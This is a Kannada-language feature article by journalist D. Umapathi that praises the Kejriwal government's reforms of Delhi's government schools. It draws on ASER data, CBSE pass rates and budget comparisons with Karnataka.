ಸರ್ಕಾರಿ ಶಾಲೆಗಳಿಗೆ ರೆಕ್ಕೆ ಕಟ್ಟಿದ ಕೇಜ್ರೀವಾಲ್ ಸರ್ಕಾರ!

ಡಿ.ಉಮಾಪತಿ

ಆಮ್ ಆದ್ಮೀ ಪಾರ್ಟಿ 2015ರ ದೆಹಲಿ ವಿಧಾನಸಭಾ ಚುನಾವಣೆಗಳಲ್ಲಿ ಒಟ್ಟು 70 ಸೀಟುಗಳ ಪೈಕಿ 67ನ್ನು ಗೆದ್ದು ದಾಖಲೆ ಸ್ಥಾಪಿಸಿತ್ತು. ಕಳೆದ ನಾಲ್ಕೂವರೆ ವರ್ಷಗಳಿಂದ ದೆಹಲಿಯ ಅರವಿಂದ್ ಕೇಜ್ರೀವಾಲ್ ನೇತೃತ್ವದ ಸರ್ಕಾರ ಶಿಕ್ಷಣ ವ್ಯವಸ್ಥೆಯಲ್ಲಿ ಭಾರೀ ಪ್ರಮಾಣದ ಸುಧಾರಣೆಗೆ ಕೈ ಹಾಕಿ, ಸೈ ಎನಿಸಿಕೊಂಡಿದೆ. ಇಲ್ಲಿಯ ಶಾಲಾ ಶಿಕ್ಷಣದ ಮೂಲಸೌಕರ್ಯಗಳು ಅಸಾಧಾರಣ ಎನ್ನುವ ಮಟ್ಟಿಗೆ ಸುಧಾರಿಸಿವೆ. ಕಲಿಯುವ ಕ್ರಮಗಳನ್ನು ಸುಧಾರಿಸಿ ಬದಲಿಸಲಾಗಿದೆ ಈ ಪ್ರಕ್ರಿಯೆಯನ್ನು ‘ಕಿರು ಕ್ರಾಂತಿ’ ಎಂದು ಕರೆಯುವವರೂ ಇದ್ದಾರೆ. ಯಾವುದೇ ರಾಜ್ಯಕ್ಕೆ ಅನುಕರಣೀಯ ಮಾದರಿಯಾಗಬಲ್ಲ ದೆಹಲಿ ಸರ್ಕಾರದ ಸಾಧನೆಯನ್ನು ಹಿರಿಯ ಪತ್ರಕರ್ತ ಡಿ.ಉಮಾಪತಿ ಹತ್ತಿರದಿಂದ ಗಮನಿಸಿ ದಾಖಲಿಸಿದ್ದಾರೆ.

ಶಿಕ್ಷಣವು ಸಮಸಮಾಜದ ಮೂಲಾಧಾರ. ಉತ್ತಮ ಶಿಕ್ಷಣ ಎಲ್ಲರ ಅಧಿಕಾರ. ಆದರೆ ವಾಸ್ತವದಲ್ಲಿ ಅದು ಕೆಲವರದೇ ವಿಶೇಷಾಧಿಕಾರವಾಗಿ ಪರಿಣಮಿಸಿದೆ. ಐದನೆಯ ತರಗತಿಯನ್ನು ತಲುಪಿರುವ ಮಗುವಿಗೆ ಎರಡನೆಯ ತರಗತಿಯ ಪಠ್ಯಪುಸ್ತಕವನ್ನು ಓದಲು ಬಾರದು. ಕೂಡಿ ಕಳೆವ ಸರಳ ಲೆಕ್ಕವನ್ನು ಅರಿಯದು. ಇಂತಹ ಮಕ್ಕಳ ಪ್ರಮಾಣ ಶೇ.50ಕ್ಕಿಂತ ಹೆಚ್ಚು. ಮಕ್ಕಳು ಎಂತಹ ಶಾಲೆಯಲ್ಲಿ ಕಲಿಯುತ್ತಾರೆ, ಅವರಿಗೆ ಸಿಗುವ ಅವಕಾಶಗಳೇನು, ಹಾಗೂ ಅವರ ಬದುಕು ಭವಿಷ್ಯವೇನು ಎಂಬುದು ಅವರ ತಂದೆತಾಯಿಗಳ ಸಾಮಾಜಿಕ-ಆರ್ಥಿಕ ಸ್ಥಿತಿಗತಿಗಳನ್ನು ಅವಲಂಬಿಸುವ ಸ್ಥಿತಿ ಭಾರತದಲ್ಲಿ ಬೇರು ಬಿಟ್ಟಿದೆ. ಶಾಲೆಗಳ ಗುಣಮಟ್ಟ ಸಾಮಥ್ರ್ಯಗಳನ್ನು ಸುಧಾರಿಸಿ ಮೇಲೆತ್ತಲು ನಿಸ್ವಾರ್ಥದಿಂದ ದುಡಿಯುವ ಬದ್ಧತೆಯುಳ್ಳ ಜನರ ಕೊರತೆಯಿದೆ. ಭಾರತದಲ್ಲಿನ ಶಾಲಾಶಿಕ್ಷಣದ ಬಿಕ್ಕಟ್ಟನ್ನು ಬಗೆಹರಿಸುವುದು ಕೇವಲ ಶಿಕ್ಷಕರಿಂದ ಸಾಧ್ಯವಿಲ್ಲ. ಶಿಕ್ಷಕರ ಬೆನ್ನಿಗೆ ನಿಲ್ಲುವ ಉತ್ಕೃಷ್ಟ ಪ್ರಾಂಶುಪಾಲರು, ಶಾಲೆಗಳೊಂದಿಗೆ ಬೆಸೆದುಕೊಂಡ ಜಾಗೃತ ಪೋಷಕರು, ದೂರದೃಷ್ಟಿಯುಳ್ಳ ಅಧಿಕಾರಿಗಳು-ರಾಜಕಾರಣಿಗಳು, ನಾಗರಿಕ ಸಮಾಜದ ಮುಂದಾಳುಗಳು, ಸಂಪನ್ಮೂಲ ರೂಢಿಸಿಕೊಡುವ ಕಾರ್ಪೊರೇಟ್ ಹುದ್ದರಿಗಳ ಅಗತ್ಯವಿದೆ ಎನ್ನುತ್ತದೆ ಟೀಚ್ ಫರ್ ಇಂಡಿಯಾ ಸಂಸ್ಥೆ.

ಮುಂಚೂಣಿಯ ಅನೇಕ ದೇಶಗಳು ಬಡತನದಿಂದ ಬಿಡಿಸಿಕೊಂಡು ಮೇಲೇಳಲು ಅವುಗಳು ಸರ್ವ ಜನವರ್ಗಗಳ ಕೈಗೆಟುಕುವಂತೆ ಇಲ್ಲವೇ ಸರ್ಕಾರವೇ ವೆಚ್ಚ ಭರಿಸಿ ಜಾರಿಗೆ ತಂದ ಪರಿಪುಷ್ಟ ಸರ್ಕಾರಿ ಶಾಲಾ ಶಿಕ್ಷಣವೇ ಕಾರಣ ಎನ್ನಲಾಗಿದೆ. ಒಂದು ದೇಶದ ಸಮೃದ್ಧ ಉತ್ಪಾದಕತೆ ಮತ್ತು ಪ್ರಗತಿಪರತೆಯ ಅಡಿಪಾಯ ಆ ದೇಶದ ಉತ್ತಮ ಶಿಕ್ಷಣ ವ್ಯವಸ್ಥೆಯೇ ಆಗಿರುತ್ತದೆ. ಗುಣಮಟ್ಟದ ಪ್ರಗತಿಪರ ಶಿಕ್ಷಣವು ಸಮಾನತೆ ಮತ್ತು ಸೃಜನಶೀಲತೆಗೆ ರೆಕ್ಕೆ ಕಟ್ಟಿ ಕೊಡಬಲ್ಲದು.

ಸ್ವತಂತ್ರ ಭಾರತದ ಒಳನಾಡು- ಹಳ್ಳಿಗಾಡು-ದೂರನಾಡಿನ ಸಾಕಷ್ಟು ಜನಸಂಖ್ಯೆ ಈಗಲೂ ಶಾಲಾ ಶಿಕ್ಷಣಕ್ಕೆ ಎರವಾಗಿರುವುದು ಕಹಿ ಸತ್ಯ. 2018ರ ಎ.ಎಸ್.ಇ.ಆರ್. ವರದಿಯ  (Annual Status of Education Report) ಪ್ರಕಾರ ಭಾರತದಲ್ಲಿ ಐದು ವರ್ಷಗಳ ಶಾಲಾ ಶಿಕ್ಷಣದ ನಂತರ 10-11 ವಯೋಮಾನದ ಶೇ.51ರಷ್ಟು ವಿದ್ಯಾರ್ಥಿಗಳು ಮಾತ್ರವೇ ಎರಡನೆಯ ಇಯತ್ತೆಯ ಪಠ್ಯ ಪುಸ್ತಕವನ್ನು ಓದಬಲ್ಲರು.

ದೇಶದ ಬಹುತೇಕ ನಾಗರಿಕರ ಮಕ್ಕಳು ಗುಣಮಟ್ಟದ ಶಿಕ್ಷಣದಿಂದ ವಂಚಿತವಾಗಿವೆ. ಮಕ್ಕಳ ಭವಿಷ್ಯ ಬೆಳಕಾಗಿಸುವ ಹಂಬಲ ಹೊತ್ತ ದುರ್ಬಲರು ಖಾಸಗಿ ಶಾಲೆಗಳ ಮುಂದೆ ಕೈ ಜೋಡಿಸಿ ದೈನೇಸಿಗಳಾಗಿದ್ದಾರೆ. ಇಂಗ್ಲಿಷ್ ಕಲಿಸುವ ಆಸೆ ತೋರಿಸುವ ಈ ಖಾಸಗಿ ಶಾಲೆಗಳು ಈ ಜನರನ್ನು ಬರಿದೇ ಶೋಷಿಸುತ್ತಿವೆ. ಬಡಜನರ ಮಕ್ಕಳು ದಡ್ಡರಾಗಿಯೇ ಬಡವರಾಗಿಯೇ ಉಳಿಯುವ ಹತಾಶೆಯ ಕತ್ತಲು ಕವಿದಿದೆ. ಉಳ್ಳವರು ಸವಾರಿ ಮಾಡುವ ಅರ್ಥಸ್ಥಿತಿಗೆ ಇವರು ಅನುಗಾಲದ ಗುಲಾಮರು.

ಮಕ್ಕಳಿಗೆ ಕಲಿಸಿಕೊಡುವ ಅರ್ಹತೆ ಇಲ್ಲದಿದ್ದರೂ ಪಾಠ ಮಾಡುತ್ತಿರುವ ಶಿಕ್ಷಕರ ಸಂಖ್ಯೆ ದೊಡ್ಡದು. ಅಜಮಾಸು ಅಂದಾಜೊಂದರ ಪ್ರಕಾರ ಎಂಬತ್ತು ಲಕ್ಷ ಶಿಕ್ಷಕರ ಪೈಕಿ ಅನರ್ಹರು14 ಲಕ್ಷ! ಹಳ್ಳಿಗಳಲ್ಲಿ ಕಲಿಸಲು ಬಹಳ ಮಂದಿಗೆ ಮನಸ್ಸಿಲ್ಲ. ಕಾಯಂ ಶಿಕ್ಷಕರು ಅನೇಕರು ತಾವೇ ಸಂಬಳ ಕೊಟ್ಟು ತಮ್ಮ ಜಾಗದಲ್ಲಿ ಕೆಲಸ ಮಾಡಲು ತಮ್ಮ ಬದಲಿಯನ್ನು ನೇಮಿಸಿಕೊಂಡಿರುವ ಉದಾಹರಣೆಗಳು ವಿಶೇಷವಾಗಿ. ಉತ್ತರಪ್ರದೇಶ ಮತ್ತು ಬಿಹಾರದಂತಹ ರಾಜ್ಯಗಳಲ್ಲಿ ಕಂಡು ಬಂದಿವೆ. ತಾತ ಮುತ್ತಾತಂದಿರ ಕಾಲದಲ್ಲಿ ಮೈಲುಗಟ್ಟಲೆ ಶಾಲೆಗೆ ನಡೆಯುತ್ತಿದ್ದ, ಅಪಾಯಕಾರಿ ಹಗ್ಗದ ಸೇತುವೆ ಒಂದು ದಿಮ್ಮಿಯ ಸೇತುವೆಗಳ ಮೇಲೆ ಸಮತೂಕ ತಪ್ಪದೆ ನಡೆಯಬೇಕಾಗಿದ್ದ, ದೋಣಿಯಲ್ಲಿ ನದಿ- ಹಳ್ಳ ದಾಟುತ್ತಿದ್ದ ದುಸ್ಥಿತಿ ಈಗಲೂ ಮರೆಯಾಗಿಲ್ಲ. ಸ್ವತಂತ್ರ ಭಾರತದ ಒಳನಾಡು- ಹಳ್ಳಿಗಾಡು-ದೂರನಾಡಿನ ಸಾಕಷ್ಟು ಜನಸಂಖ್ಯೆ ಈಗಲೂ ಶಾಲಾ ಶಿಕ್ಷಣಕ್ಕೆ ಎರವಾಗಿರುವುದು ಕಹಿ ಸತ್ಯ. 2018ರ ಎ.ಎಸ್.ಇ.ಆರ್. ವರದಿಯ  (Annual Status of Education Report) ಪ್ರಕಾರ ಭಾರತದಲ್ಲಿ ಐದು ವರ್ಷಗಳ ಶಾಲಾ ಶಿಕ್ಷಣದ ನಂತರ 10-11 ವಯೋಮಾನದ ಶೇ.51ರಷ್ಟು ವಿದ್ಯಾರ್ಥಿಗಳು ಮಾತ್ರವೇ ಎರಡನೆಯ ಇಯತ್ತೆಯ ಪಠ್ಯ ಪುಸ್ತಕವನ್ನು ಓದಬಲ್ಲರು. ದೇಶದ ಶೇ.34ರಷ್ಟು ಶಾಲೆಗಳಲ್ಲಿ ಹೆಣ್ಣುಮಕ್ಕಳಿಗೆ ಪ್ರತ್ಯೇಕ ಶೌಚಾಲಯ ಇಲ್ಲ. ಶೇ.26ರಷ್ಟು ಶಾಲೆಗಳಲ್ಲಿ ಶೌಚಾಲಯಗಳೇ ಇಲ್ಲ. ಶೌಚಾಲಯಗಳಿದ್ದೂ ನೀರಿಲ್ಲದೆ ಬಳಸಲಾಗದೆ ಬೀಳು ಬಿದ್ದಿರುವ ಶೌಚಾಲಯಗಳ ಲೆಕ್ಕವನ್ನೇ ಹಿಡಿಯಲಾಗಿಲ್ಲ. ಶೇ.34ರಷ್ಟು ಶಾಲೆಗಳಿಗೆ ಆಟದ ಮೈದಾನಗಳಿಲ್ಲ. ಶೇ.26ರಷ್ಟು ಶಾಲೆಗಳಲ್ಲಿ ಗ್ರಂಥಾಲಯದ ಪುಸ್ತಕಗಳಿಲ್ಲ. 14-16ರ ವಯೋಮಾನದ ಶೇ.49ರಷ್ಟು ಮಕ್ಕಳಿಗೆ ಭಾಗಾಕಾರ ಗೊತ್ತಿಲ್ಲ. ಈ ಪೈಕಿ ಹುಡುಗರ ಪ್ರಮಾಣ ಶೇ.56. ಏಳನೆಯ ತರಗತಿ ಮುಟ್ಟಿರುವ ಶೇ.28.2ರಷ್ಟು ಮಕ್ಕಳಿಗೆ ಎರಡನೆಯ ತರಗತಿಯ ಪಾಠ ಓದಲು ಬರುವುದಿಲ್ಲ.

ಶಾಲೆಯೊಂದನ್ನು ಮುನ್ನಡೆಸುವ ಶಿಕ್ಷಕರ ತೀವ್ರ ಕೊರತೆಯನ್ನು ಸರ್ಕಾರಿ ಶಾಲೆಗಳು ಎದುರಿಸಿವೆ. ನಾವು ರೂಪಿಸುತ್ತಿರುವ ಶಿಕ್ಷಕರ ಗುಣಮಟ್ಟ ತೃಪ್ತಿಕರವಲ್ಲ. 2015ರ ಕೇಂದ್ರೀಯ ಶಿಕ್ಷಕರ ಅರ್ಹತಾ ಪರೀಕ್ಷೆಯಲ್ಲಿ (ಸೆಂಟ್ರಲ್ ಟೀಚರ್ ಎಲಿಜಿಬಲಿಟಿ ಟೆಸ್ಟ್-ಸಿ.ಟಿ.ಇ.ಟಿ) ಫೇಲಾದ ಶಿಕ್ಷಣ ಪದವೀಧರರ ಪ್ರಮಾಣ ಶೇ.83 ಎಂಬುದು ಕಳವಕಾರಿ ಸಂಗತಿ

ಕಳೆದ ವರ್ಷದ ನಮ್ಮದೇ ದಾಖಲೆಯನ್ನು ಮುರಿದದ್ದಕ್ಕೆ ದೆಹಲಿ ಸರ್ಕಾರದ ಶಿಕ್ಷಣ ಇಲಾಖೆ, ಪೋಷಕರು, ಶಿಕ್ಷಕರು ಹಾಗೂ ವಿದ್ಯಾರ್ಥಿಗಳಿಗೆ ಅಭಿನಂದನೆಗಳು ಎಂದು ಶಿಕ್ಷಣ ಮಂತ್ರಿಯೂ ಆದ ಉಪಮುಖ್ಯಮಂತ್ರಿ ಮನೀಶ್ ಸಿಸೋಡಿಯಾ ಟ್ವೀಟ್ ಮಾಡಿದ್ದರು.

ದೆಹಲಿ ಶಾಲಾ ಶಿಕ್ಷಣ ಸುಧಾರಣೆಯನ್ನು ದೇಶದ ಈ ಒಟ್ಟಾರೆ ದುಸ್ಥಿತಿಯ ಸಂದರ್ಭದಲ್ಲಿಟ್ಟು ನೋಡಬೇಕಿದೆ. ನಮ್ಮ ಸರ್ಕಾರಿ ಶಾಲಾ ವ್ಯವಸ್ಥೆಯನ್ನು ಪಾಳು ಬೀಳಿಸಿ ನಿರ್ಗತಿಕ ವರ್ಗಗಳ ಕೋಟ್ಯಂತರ ಎಳೆಯರಿಗೆ ಕನಿಷ್ಠ ಓದು- ಬರೆಹ, ಗುಣಾಕಾರ- ಭಾಗಾಕಾರ ಕಲಿಸದೆ ನಿರ್ಲಕ್ಷಿಸಿರುವವರು ಭಾರತವನ್ನು ವಿಶ್ವಗುರು ಮಾಡುತ್ತೇವೆಂದು ಹೊರಟಿರುವುದು ಅಪ್ಪಟ ಅಪಹಾಸ್ಯದ ಸಂಗತಿ. ಸರ್ಕಾರಿ ಶಾಲೆಗಳನ್ನು ನಿಧಾನ ಮರಣದತ್ತ ನೂಕಲಾಗಿದೆ.

ಆಮ್ ಆದ್ಮೀ ಪಾರ್ಟಿ 2015ರ ದೆಹಲಿ ವಿಧಾನಸಭಾ ಚುನಾವಣೆಗಳಲ್ಲಿ ಒಟ್ಟು 70 ಸೀಟುಗಳ ಪೈಕಿ 67ನ್ನು ಗೆದ್ದು ದಾಖಲೆ ಸ್ಥಾಪಿಸಿತ್ತು. (ಹಾಗೆಯೇ 2014 ಮತ್ತು 2019ರಲ್ಲಿ ದೆಹಲಿಯ ಏಳರ ಪೈಕಿ ಒಂದೂ ಲೋಕಸಭಾ ಸ್ಥಾನ ಗೆದ್ದಿಲ್ಲ). ಈ ಗೆಲುವಿನ ನಂತರ ದೆಹಲಿಯ ಶಾಲಾ ಶಿಕ್ಷಣದ ಮೂಲಸೌಕರ್ಯಗಳು ಕೆಲವೇ ವರ್ಷಗಳಲ್ಲಿ ಅಸಾಧಾರಣ ಎನ್ನುವ ಮಟ್ಟಿಗೆ ಸುಧಾರಿಸಿವೆ. ಕಲಿಯುವ ಕ್ರಮಗಳನ್ನು ಸುಧಾರಿಸಿ ಬದಲಿಸಲಾಗಿದೆ ಈ ಪ್ರಕ್ರಿಯೆಯನ್ನು ‘ಕಿರು ಕ್ರಾಂತಿ’ ಎಂದು ಕರೆಯುವವರೂ ಇದ್ದಾರೆ.

ಮೂರು ತಿಂಗಳ ಹಿಂದೆ ಮೇ ಎರಡರಂದು ದೆಹಲಿಯ ಸಿ.ಬಿ.ಎಸ್.ಇ. ಪರೀಕ್ಷಾ ಫಲಿತಾಂಶಗಳು ಹೊರಬಿದ್ದಿದ್ದವು. ದೆಹಲಿಯ ಸರ್ಕಾರಿ ಶಾಲೆಗಳ ಹನ್ನೆರಡನೆಯ ಇಯತ್ತೆಯ ವಿದ್ಯಾರ್ಥಿಗಳು ಹೊಸ ದಾಖಲೆ ಸ್ಥಾಪಿಸಿದ್ದರು. ವಿದ್ಯಾರ್ಥಿಗಳು ಹನ್ನೆರಡನೆಯ ಇಯತ್ತೆಯಲ್ಲಿ ತೇರ್ಗಡೆಯಾದ ವಿದ್ಯಾರ್ಥಿಗಳ ಶೇಕಡಾವಾರು ಪ್ರಮಾಣ 94.24. ಕಳೆದ ವರ್ಷ ಈ ಪ್ರಮಾಣ ಶೇ.91.48 ಆಗಿತ್ತು. ಕಳೆದ ವರ್ಷದ ನಮ್ಮದೇ ದಾಖಲೆಯನ್ನು ಮುರಿದದ್ದಕ್ಕೆ ದೆಹಲಿ ಸರ್ಕಾರದ ಶಿಕ್ಷಣ ಇಲಾಖೆ, ಪೋಷಕರು, ಶಿಕ್ಷಕರು ಹಾಗೂ ವಿದ್ಯಾರ್ಥಿಗಳಿಗೆ ಅಭಿನಂದನೆಗಳು ಎಂದು ಶಿಕ್ಷಣ ಮಂತ್ರಿಯೂ ಆದ ಉಪಮುಖ್ಯಮಂತ್ರಿ ಮನೀಶ್ ಸಿಸೋಡಿಯಾ ಟ್ವೀಟ್ ಮಾಡಿದ್ದರು.

ಕರ್ನಾಟಕದ ಸರ್ಕಾರಿ ಪಿ,ಯು. ಕಾಲೇಜುಗಳಲ್ಲಿ ಇದೇ ವರ್ಷ ಹೊರಬಿದ್ದ ತೇರ್ಗಡೆ ಪ್ರಮಾಣ ಶೇ.50.94. 2018ನೆಯ ಪ್ರಮಾಣಕ್ಕಿಂತ ಶೇ.1.99ರಷ್ಟು ಹೆಚ್ಚು. ಅನುದಾನಿತ ಕಾಲೇಜುಗಳಲ್ಲಿ ತೇರ್ಗಡೆ ಪ್ರಮಾಣ ಶೇ.60.42. ಅನುದಾನರಹಿತ ಖಾಸಗಿ ಕಾಲೇಜುಗಳಲ್ಲಿನ ಪಿ.ಯು. ತೇರ್ಗಡೆ ಪ್ರಮಾಣ ಶೇ.68.42. ಕರ್ನಾಟಕ ಪದವಿಪೂರ್ವ ಶಿಕ್ಷಣ ಮಂಡಳಿಯ ಪಠ್ಯಕ್ರಮಕ್ಕೆ ಹೋಲಿಸಿದರೆ ಸಿ.ಬಿ.ಎಸ್.ಇ. ಪಠ್ಯಕ್ರಮ ವಿದ್ಯಾರ್ಥಿಗಳ ಪಾಲಿಗೆ ತುಸು ಹೆಚ್ಚೇ ಕಠಿಣ.

ದೆಹಲಿಯ ಸರ್ಕಾರಿ ಶಾಲೆಗಳ 12ನೆಯ ಇಯತ್ತೆಯಲ್ಲಿ ಕಳೆದ ಸಾಲಿನಲ್ಲಿ ಶೇ.90.64ರಷ್ಟು ವಿದ್ಯಾರ್ಥಿಗಳು ತೇರ್ಗಡೆಯಾಗಿದ್ದರು. 203 ಶಾಲೆಗಳಲ್ಲಿ ತೇರ್ಗಡೆ ಪ್ರಮಾಣ ನೂರಕ್ಕೆ ನೂರು! 2017ರಲ್ಲಿ ಇಂತಹ ಶಾಲೆಗಳ ಸಂಖ್ಯೆ 112 ಇದ್ದದ್ದು 2018ರಲ್ಲಿ 168ಕ್ಕೆ ಜಿಗಿದಿತ್ತು. ಶೇ.90ಕ್ಕಿಂತ ಹೆಚ್ಚು ತೇರ್ಗಡೆ ಪ್ರಮಾಣ ಕಂಡಿರುವ ಶಾಲೆಗಳ ಸಂಖ್ಯೆ 732. ಈ ಪ್ರಮಾಣ 2017ರಲ್ಲಿ 554 ಮತ್ತು 2018ರಲ್ಲಿ 638 ಆಗಿತ್ತು. 21 ಶಾಲೆಗಳಲ್ಲಿ ಈ ಫಲಿತಾಂಶ ಶೇ.99.92ರಷ್ಟು. ಕಳೆದ ವರ್ಷ ಈ ಪ್ರಮಾಣ ಶೇ.99.79ರಷ್ಟಿತ್ತು. ಆಮ್ ಆದ್ಮೀ ಪಾರ್ಟಿ 2015ರಲ್ಲಿ ಅಧಿಕಾರಕ್ಕೆ ಬಂದ ನಂತರ ಹನ್ನೆರಡನೆಯ ತರಗತಿ ಫಲಿತಾಂಶಗಳು ಸತತ ಸುಧಾರಣೆ ಕಂಡಿವೆ. 2016ರಲ್ಲಿ ತೇರ್ಗಡೆಯ ಶೇಕಡಾವಾರು ಪ್ರಮಾಣ 85.9, 2017ರಲ್ಲಿ ಶೇ.88.2 ಆಗಿತ್ತು. ಹತ್ತನೆಯ ತರಗತಿಯಲ್ಲಿ ತೇರ್ಗಡೆ ಶೇಕಡಾವಾರು ಪ್ರಮಾಣ 2007ರಿಂದಲೇ ಹೆಚ್ಚತೊಡಗಿತ್ತು. ಶೇ.59.7ರಿಂದ ಶೇ.71.1ಕ್ಕೆ ಜಿಗಿದಿತ್ತು. 2009ರ ನಂತರ ಶೇ.89ಕ್ಕಿಂತ ಕೆಳಗೆ ಇಳಿದೇ ಇಲ್ಲ.

ದೆಹಲಿ ಒಂದು ನಗರ ರಾಜ್ಯ. ಪೊಲೀಸು, ಜಮೀನಿನ ಮೇಲೆ ಅಧಿಕಾರವಿಲ್ಲದ ಈ ಪುಟ್ಟ ಅರೆರಾಜ್ಯವು ಶಿಕ್ಷಣಕ್ಕೆ ಮೀಸಲಿರಿಸಿರುವ ಹಣಕಾಸು ಸಂಪನ್ಮೂಲದ ಮುಂದೆ ಕರ್ನಾಟಕದಂತಹ ದೊಡ್ಡ ರಾಜ್ಯದ ಮೊತ್ತ ಪೇಲವಗೊಳ್ಳುತ್ತದೆ. ಕರ್ನಾಟಕದಲ್ಲಿ ಒಂದರಿಂದ ಹತ್ತನೆಯ ತರಗತಿವರೆಗಿನ ಸರ್ಕಾರಿ ಶಾಲೆಗಳ ವಿದ್ಯಾರ್ಥಿಗಳ ಸಂಖ್ಯೆ 46.50 ಲಕ್ಷ. ದೆಹಲಿಯ ಶಾಲಾ ವಿದ್ಯಾರ್ಥಿಗಳ ಸಂಖ್ಯೆ 16 ಲಕ್ಷ. 2019ರಲ್ಲಿ ದೆಹಲಿ ಸರ್ಕಾರ ಶಿಕ್ಷಣಕ್ಕೆ 15 ಸಾವಿರ ಕೋಟಿ ರುಪಾಯಿಗಳನ್ನು ತೆಗೆದಿರಿಸುತ್ತದೆ. ಆದರೆ ಕರ್ನಾಟಕ ಶಾಲಾ ಶಿಕ್ಷಣವೂ ಸೇರಿದಂತೆ ತನ್ನ ಇಡೀ ಶಿಕ್ಷಣಕ್ಕೆ 2019ರ ಬಜೆಟ್ ನಲ್ಲಿ ಕೊಟ್ಟಿರುವ ಮೊತ್ತ ಕೇವಲ 27,943 ಕೋಟಿ ರುಪಾಯಿ.

ಕಳೆದ ನಾಲ್ಕೂವರೆ ವರ್ಷಗಳಿಂದ ದೆಹಲಿಯ ಆಮ್ ಆದ್ಮೀ ಪಾರ್ಟಿಯ ಅರವಿಂದ್ ಕೇಜ್ರೀವಾಲ್ ನೇತೃತ್ವದ ಸರ್ಕಾರ ಶಿಕ್ಷಣ ವ್ಯವಸ್ಥೆಯ ಭಾರೀ ಪ್ರಮಾಣದ ಸುಧಾರಣೆಗೆ ಕೈ ಹಾಕಿದೆ. ಮತ್ತು ಸೈ ಎನಿಸಿಕೊಂಡಿದೆ ಕೂಡ. ದೆಹಲಿಯ ಶಿಕ್ಷಣ ಮಂತ್ರಿ ಮನೀಶ್ ಸಿಸೋಡಿಯ ಅವರಿಗೆ ಸಲಹೆಗಾರ್ತಿಯಾಗಿ ಕೆಲಸ ಮಾಡಿದ ಆಪ್ ಕಾರ್ಯಕರ್ತೆ ಆತಿಶಿ ಅವರು ಈ ಯಶಸ್ಸಿನ ಹಿಂದಿನ ಮೆದುಳು ಎನ್ನಲಾಗಿದೆ. 2019ರ ಲೋಕಸಭೆ ಚುನಾವಣೆಗೆ ಮುನ್ನ ಅವರು ಆತಿಶಿ ಮರ್ಲೇನಾ ಆಗಿದ್ದರು. ಮರ್ಲೇನಾ ಎಂಬುದು ಕ್ರೈಸ್ತ ಮತವನ್ನು ಧ್ವನಿಸುತ್ತದೆಂದು ಅದನ್ನು ಕೈಬಿಟ್ಟರು. ಮಾಕ್ರ್ಸ್ ಮತ್ತು ಲೆನಿನ್ ಹೆಸರುಗಳ ಸಂಗಮ. ಆತಿಶಿಯ ತಂದೆ ಮತ್ತು ತಾಯಿ ಈಗಲೂ ಎಡಪಂಥೀಯರು. ಆತಿಶಿ ಹೆಸರಿಗೆ ಮರ್ಲೇನಾ ಸೇರಿಕೊಂಡ ಹಿನ್ನೆಲೆಯಿದು. ಆಕ್ಸ್ ಫರ್ಡ್ ವಿಶ್ವವಿದ್ಯಾಲಯದಿಂದ ಸ್ನಾತಕೋತ್ತರ ಪದವಿ ಮತ್ತು ರ್ರೋಡ್ಸ್ ಸ್ಕಾಲರ್ ಆಗಿ ಶೈಕ್ಷಣಿಕ ಸಂಶೋಧನೆಯಲ್ಲಿ ಸ್ನಾತಕೋತ್ತರ ಪದವೀಧರೆ ಆತಿಶಿ. ಮಧ್ಯಪ್ರದೇಶದ ಹಳ್ಳಿಗಳಲ್ಲಿ ಕೆಲಸ ಮಾಡಿದ್ದಾರೆ. ಸಾಮಾಜಿಕ ಪ್ರತಿಬದ್ಧತೆ ಉಳ್ಳ ಪ್ರತಿಭಾವಂತೆ. ಆಮ್ ಆದ್ಮಿ ಪಾರ್ಟಿಯ ರಾಜಕಾರಣ ಪ್ರವೇಶಿಸಿ ದೆಹಲಿಯ 16 ಲಕ್ಷ ಶಾಲಾ ಮಕ್ಕಳ ಭವಿಷ್ಯವನ್ನು ಕಟ್ಟಿದಾಕೆ.

ತನ್ನ ಚೊಚ್ಚಲ ಬಜೆಟ್ ನಲ್ಲೇ ಶಿಕ್ಷಣಕ್ಕೆ ಮೊದಲ ಆದ್ಯತೆ ನೀಡಿದ ಕೇಜ್ರೀವಾಲ್ ಸರ್ಕಾರ ಈ ಬಾಬತ್ತಿಗೆ 9,836 ಕೋಟಿ ರುಪಾಯಿಗಳನ್ನು ತೆಗೆದಿರಿಸಿತು. 2016-17ರಲ್ಲಿ 10,0690 ಕೋಟಿ ರೂ, 2017-18ರಲ್ಲಿ 11,300 ಕೋಟಿ ರೂ, 2018-19ರಲ್ಲಿ 13,997 ಕೋಟಿ ರುಪಾಯಿಯನ್ನು (ಶೇ.26) ಹಂಚಿಕೆ ಮಾಡಿತ್ತು. 2019ರಲ್ಲಿ ಈ ಮೊತ್ತವನ್ನು 15 ಸಾವಿರ ಕೋಟಿ ರುಪಾಯಿಗೆ ಹೆಚ್ಚಿಸಿತು. ಶಿಕ್ಷಣವನ್ನು ಕೇವಲ ಸರ್ಕಾರಿ ಅಧಿಕಾರಿಗಳಿಗೆ ಬಿಟ್ಟುಕೊಟ್ಟು ತೆಪ್ಪಗೆ ಕುಳಿತುಕೊಳ್ಳಲಿಲ್ಲ. ಸಮರ್ಪಣೆ, ಉತ್ಸಾಹ, ಚೈತನ್ಯ, ಪ್ರತಿಭಾವಂತ ಯುವ ತಂಡಗಳನ್ನು ರಚಿಸಿತು. ಉಪಮುಖ್ಯಮಂತ್ರಿ ಮನೀಶ್ ಸಿಸೋಡಿಯಾ ಶಿಕ್ಷಣ ಖಾತೆಯನ್ನೇ ಆರಿಸಿಕೊಂಡರು. ಆತಿಶಿ ಮರ್ಲೇನಾ ಅವರಂತಹ ಪ್ರತಿಭಾವಂತೆ ಸಲಹೆಗಾರ್ತಿಯಾಗಿ ಅವರ ಬಲಗೈಯಾದರು. ಇಂಡಿಯನ್ ಇನ್ಸ್ಟಿಟ್ಯೂಟ್ ಆಫ್ ಮ್ಯಾನೇಜ್ಮೆಂಟ್ ಪದವೀಧರ ಸತ್ಯನಾರಾಯಣನ್ ನೀತಿ ನಿರ್ಧಾರಗಳ ಕುರಿತು ನೆರವಾದರು. ಶಿಕ್ಷಣ ಕ್ಷೇತ್ರದ ಒಳ ಹೊರಗನ್ನು ಬಲ್ಲ ಆಮ್ ಆದ್ಮಿ ಪಾರ್ಟಿಯ ಹತ್ತಾರು ಸಮರ್ಪಿತ ಯುವ ಸ್ವಯಂಸೇವಕರು ಹಗಲಿರುಳು ಇವರೊಂದಿಗೆ ದುಡಿದರು.

